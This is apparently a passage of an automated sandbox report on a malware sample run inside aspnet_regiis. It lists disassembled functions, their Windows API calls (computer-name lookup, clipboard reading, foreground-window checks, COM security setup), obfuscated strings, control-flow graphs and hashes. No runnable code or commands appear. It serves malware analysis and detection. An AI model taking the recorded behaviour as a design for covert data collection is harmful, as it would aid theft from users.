                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerFreeLibraryName
                                                                                    • String ID: KHGN
                                                                                    • API String ID: 2904949787-1032087821
                                                                                    • Opcode ID: 7744223dcdceb7e007014620750d255138bb2419730377818cb3cac8bb048847
                                                                                    • Instruction ID: 26fbfd6bfa78566469a673976c36456c0caa07fe0235079c37b042f28f0f38bf
                                                                                    • Opcode Fuzzy Hash: 7744223dcdceb7e007014620750d255138bb2419730377818cb3cac8bb048847
                                                                                    • Instruction Fuzzy Hash: 8621D17010C6C58EDB258B35A8A1BFB7FE4EB9B344F18486DD0C9C7282CB35440A9B52

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 568 8cb840-8cb8b6 FreeLibrary call 8df450 573 8cb8c0-8cb8e5 568->573 573->573 574 8cb8e7-8cb8f1 573->574 575 8cb90b-8cb942 GetComputerNameExA 574->575 576 8cb8f3-8cb8fa 574->576 578 8cb946 575->578 577 8cb900-8cb909 576->577 577->575 577->577 578->578
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?), ref: 008CB875
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerFreeLibraryName
                                                                                    • String ID: KHGN
                                                                                    • API String ID: 2904949787-1032087821
                                                                                    • Opcode ID: 5caa1ac9ab9b40e4fbad0f5745419bf5b99a4f41099e75f25dbfa760c02810af
                                                                                    • Instruction ID: d158a2f8d18b23f4c1a3c5c9cda4134fde6c4db03ab11a51d1810a857801e16b
                                                                                    • Opcode Fuzzy Hash: 5caa1ac9ab9b40e4fbad0f5745419bf5b99a4f41099e75f25dbfa760c02810af
                                                                                    • Instruction Fuzzy Hash: BF11E3701486858FD7258F35E8A1BEB7FE8FB8B344F14482DD1CAC7291DB35480A9B52

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 717 8cb94d-8cb957 718 8cb959 717->718 719 8cb96b-8cb9a6 717->719 720 8cb960-8cb969 718->720 722 8cb9b0-8cb9fb 719->722 720->719 720->720 722->722 723 8cb9fd-8cba07 722->723 724 8cba2d-8cba34 723->724 725 8cba09-8cba1f 723->725 726 8cba3b-8cba71 GetComputerNameExA 724->726 727 8cba20-8cba29 725->727 727->727 728 8cba2b 727->728 728->726
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 008CBA54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: bC
                                                                                    • API String ID: 3545744682-4190571504
                                                                                    • Opcode ID: 88c49bff5c4c4b70e252d705c338ed919aaafd6219e15f293cbb4dbd05fdea32
                                                                                    • Instruction ID: 7525f666dd206e0e18b0217833d3d103e96f467e0af1c8ff4ab4264b03083981
                                                                                    • Opcode Fuzzy Hash: 88c49bff5c4c4b70e252d705c338ed919aaafd6219e15f293cbb4dbd05fdea32
                                                                                    • Instruction Fuzzy Hash: 7621023250D7E18BD7358F658494BFABBF1EF92300F59884DC8CADB241CA748409CB52
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 008CBA54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: bC
                                                                                    • API String ID: 3545744682-4190571504
                                                                                    • Opcode ID: a6916ad97bded3dc690a54e0b73c6b3e6c8e2b3725023f240339c34580f5de8b
                                                                                    • Instruction ID: 0e992b1d2bc31e95c3320bad35cd60e2d030cd811f3ec6d70fcc1cd805c2156c
                                                                                    • Opcode Fuzzy Hash: a6916ad97bded3dc690a54e0b73c6b3e6c8e2b3725023f240339c34580f5de8b
                                                                                    • Instruction Fuzzy Hash: 9821D33654D7A1CBD734CF6084947AABBE2FFC5314F15895DC9CA9B340CA749809CB92
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: KHGN
                                                                                    • API String ID: 3545744682-1032087821
                                                                                    • Opcode ID: b440fc7327077b79c6cb0b4aa0ff832e17bedec18421155a8a38b252b906cf6d
                                                                                    • Instruction ID: 4e7baef0649fade7d97a37883579400288636d7321151afd8e80194b3e5e90dd
                                                                                    • Opcode Fuzzy Hash: b440fc7327077b79c6cb0b4aa0ff832e17bedec18421155a8a38b252b906cf6d
                                                                                    • Instruction Fuzzy Hash: A511C6701486858FD7258B35A8A1BFB7FE8EB8B354F14482DD1C9C7281DB35884A9B52
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 008A9E1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 21bb12c05024495e9d7954980c9a2ad69e1e65ce3b2fe56fefd74e259a5a990f
                                                                                    • Instruction ID: 991c24069e1247068c7932e53ef0889e25bc501bb2cc6f3708b373cd6df45916
                                                                                    • Opcode Fuzzy Hash: 21bb12c05024495e9d7954980c9a2ad69e1e65ce3b2fe56fefd74e259a5a990f
                                                                                    • Instruction Fuzzy Hash: 7B1108756443908FC7188F25D8816A97FE1FB96325B1AC09CD491EB762C23CE846CB54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fc8d56082bd1bef738abaa71f7f9f58c84841ee8919388b0a80fc672ee8b508a
                                                                                    • Instruction ID: db6fe198cf2825323f49ff627c36249a38ea88bd638b1b52a43081269915152e
                                                                                    • Opcode Fuzzy Hash: fc8d56082bd1bef738abaa71f7f9f58c84841ee8919388b0a80fc672ee8b508a
                                                                                    • Instruction Fuzzy Hash: A0F0CD71124341EFD7201F38AC89E27377CFF86701F040D3AF541D6261EF61A8089662
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 008D6831
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguageUser
                                                                                    • String ID:
                                                                                    • API String ID: 95929093-0
                                                                                    • Opcode ID: 0490aa9c626717aed1367f7ef7dbbff0dacd0e9b7ade04de578dfe5747dd4d2f
                                                                                    • Instruction ID: a24a1b8cca440f4b4d752d38d0fb4c57663dc6b1c5c203e465f2c491d9c2e4c4
                                                                                    • Opcode Fuzzy Hash: 0490aa9c626717aed1367f7ef7dbbff0dacd0e9b7ade04de578dfe5747dd4d2f
                                                                                    • Instruction Fuzzy Hash: B1110834804686CFC719DB3C84522A9BFB2BF56314F04439CC48E87392DB319914DB12
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 62e3ff22ad5920495449b321379d3ee0ff3778e923a85bf558c3c7d5429e6826
                                                                                    • Instruction ID: 230370fc12fc9bfe4e2fabcf4ea21c0a6c2f98a91638e279e8b481b2bdade4e5
                                                                                    • Opcode Fuzzy Hash: 62e3ff22ad5920495449b321379d3ee0ff3778e923a85bf558c3c7d5429e6826
                                                                                    • Instruction Fuzzy Hash: A7F04971608702CFE300CF24C59930BBBE6BB84314F21880CE0944B350C7B5EA498FC2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: c35033cda6076425ecd99dccebe9069713dad681f35ae370ed033ea88e4bfd35
                                                                                    • Instruction ID: e64dc5f5be6af0aa851bcf6ddd715b5694a55a77a4bae7f4e20ea44a3d4f0fc6
                                                                                    • Opcode Fuzzy Hash: c35033cda6076425ecd99dccebe9069713dad681f35ae370ed033ea88e4bfd35
                                                                                    • Instruction Fuzzy Hash: BCF074B4609302DFE354DF69D5A871BBBE1FB88304F11881DE5958B390D7B59A48CF82
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008AC6B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 640775948-0
                                                                                    • Opcode ID: 001affdc785ae9f4e7fc74cabc91418995358c05d9f8ebe43ca841e9ce61623b
                                                                                    • Instruction ID: 145f126806f418e23a208380bf87bfc6a623b4794e3b821b554fba0f6315d4fd
                                                                                    • Opcode Fuzzy Hash: 001affdc785ae9f4e7fc74cabc91418995358c05d9f8ebe43ca841e9ce61623b
                                                                                    • Instruction Fuzzy Hash: 97E05E35BD43406BF6394A08DC57F44321263C4F31F388314F310EE3D8C9A8A501420C
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 008AC673
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 36f4978372240e079e15530c060a79bdd5eeed4fb6e47ae67f4cbd670ff62036
                                                                                    • Instruction ID: 9da58c88178d637182354639675b7453a29598c882c46decd2105c4eb2741a7e
                                                                                    • Opcode Fuzzy Hash: 36f4978372240e079e15530c060a79bdd5eeed4fb6e47ae67f4cbd670ff62036
                                                                                    • Instruction Fuzzy Hash: C0E02731B506441FD304571CDC87F45351B93C1335F4C82146560CF3C4D974AD10C155
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 008DE6A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    • Opcode ID: 91471a4d87a0d781c35da4603728edfecb0a1bd8c8a93be026e632c91093be93
                                                                                    • Instruction ID: ec20915824687f1e19c5322a08a5b07c6a5e102f696fec4f7fda8f3a1b009450
                                                                                    • Opcode Fuzzy Hash: 91471a4d87a0d781c35da4603728edfecb0a1bd8c8a93be026e632c91093be93
                                                                                    • Instruction Fuzzy Hash: 85C08CF82080E49BC358D715FCCA96A3B5EFFC52083098138D94B0BB27E9606801C783
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000,008DD8F6,?,?,?,00000000,008AB40D,00000000,00000000), ref: 008DBCCE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: e280a4e85fd5b7d14cdf85162ea361dc2767c64ccb1a20d095960d74ceddab42
                                                                                    • Instruction ID: bea16d8e8190a9bd2058e28cf4529b3375d191112a3f69cd0edb114f4f35ce0c
                                                                                    • Opcode Fuzzy Hash: e280a4e85fd5b7d14cdf85162ea361dc2767c64ccb1a20d095960d74ceddab42
                                                                                    • Instruction Fuzzy Hash: 70D01231405522EBC7105F28FC06F963B54FF59720F074462B444AF171C764EC50DAD5
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,008A8797,2D2C008A), ref: 008DBCA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 846ac37c85ba86b31edbc96e5f0faa81e51aaf8eaff742b611f16d78983b3780
                                                                                    • Instruction ID: 0e3588b82e58c8c0c45069089878feba6d7ebfc45a239fbb17d62fa97f60194c
                                                                                    • Opcode Fuzzy Hash: 846ac37c85ba86b31edbc96e5f0faa81e51aaf8eaff742b611f16d78983b3780
                                                                                    • Instruction Fuzzy Hash: 77C09231046120ABCA206B28FC09FCA7F68FF55360F1681A2B105A71B3C770AC82EBD5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ($?$f$u$}
                                                                                    • API String ID: 0-3561895482
                                                                                    • Opcode ID: 8deb2fab5c54fab4ffdb270e8c5b525b854a8c6ffc67e71413270e521bf7ea3b
                                                                                    • Instruction ID: 81461ece97d60f8ab6420ee4aa259898d5c11de00e9aea5ea20203a81fd33aed
                                                                                    • Opcode Fuzzy Hash: 8deb2fab5c54fab4ffdb270e8c5b525b854a8c6ffc67e71413270e521bf7ea3b
                                                                                    • Instruction Fuzzy Hash: 0512A071A0C7808BD764DF3884953AEBBE1FB95324F598A2EE4D9C7392D63489418B43
                                                                                    APIs
                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 008C38A8
                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 008C394C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentExpandStrings
                                                                                    • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                    • API String ID: 237503144-3964871452
                                                                                    • Opcode ID: 577fce801f5068eac9ab952d45586ded8fcaa24daeb304af5ba587df343691ef
                                                                                    • Instruction ID: 2b906c8aa876586702dbd04ed31ca9df9c51ffb6c3dc082d3eeb0dde06fe398e
                                                                                    • Opcode Fuzzy Hash: 577fce801f5068eac9ab952d45586ded8fcaa24daeb304af5ba587df343691ef
                                                                                    • Instruction Fuzzy Hash: 3CE1137160C3818BD724CF68D8917ABBBE1FB85314F044A2DFA968B381D775E905DB82
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1494355150-0
                                                                                    • Opcode ID: 511844c92cc24742afb45240a06c3d9ed1e2d36076aad8103cd04022a3e8520b
                                                                                    • Instruction ID: e8dd0fe710b5e0618421b2c3527ba957bebb31b8a66cfa33ee42f5a3bf273cef
                                                                                    • Opcode Fuzzy Hash: 511844c92cc24742afb45240a06c3d9ed1e2d36076aad8103cd04022a3e8520b
                                                                                    • Instruction Fuzzy Hash: B3510372A1C7518FC310AF7C888921EBAE1ABD5224F098B6DE8E4D73D1D674890987D2
                                                                                    APIs
                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 008C8DFB
                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 008C8F3C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentExpandStrings
                                                                                    • String ID: rM$zM
                                                                                    • API String ID: 237503144-2784921869
                                                                                    • Opcode ID: 27f351bc6deb90a4d3b5ebfb9eeb63c707f3b976fdfab95cca37a98c7eee35c9
                                                                                    • Instruction ID: fbcc4d16b76e080b8185eb09d34ecccbfc112155f6a018c38c3a3fc9869d9cb7
                                                                                    • Opcode Fuzzy Hash: 27f351bc6deb90a4d3b5ebfb9eeb63c707f3b976fdfab95cca37a98c7eee35c9
                                                                                    • Instruction Fuzzy Hash: AA61CFF0A443229FE754CF69C891A9ABFB0FB56350F1942ACE4459F392C3748842CBD5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
